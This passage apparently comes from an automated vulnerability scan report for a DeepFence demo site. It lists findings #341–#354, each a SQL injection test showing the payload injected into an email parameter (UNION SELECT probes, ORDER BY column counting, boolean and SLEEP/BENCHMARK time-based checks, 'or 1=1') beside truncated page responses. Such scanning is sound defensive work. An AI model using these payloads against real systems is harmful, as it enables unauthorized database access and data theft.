src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #341\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width\n=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps\n/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\">\nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\">\n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJb\nWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQI\noqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #342\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.io+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #343\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io,\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #344\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #345\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #346\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #347Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #348\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #349\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,3,1))='S'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #350\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #351\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #352\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #353\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #354\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' o/**/r 1/0 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 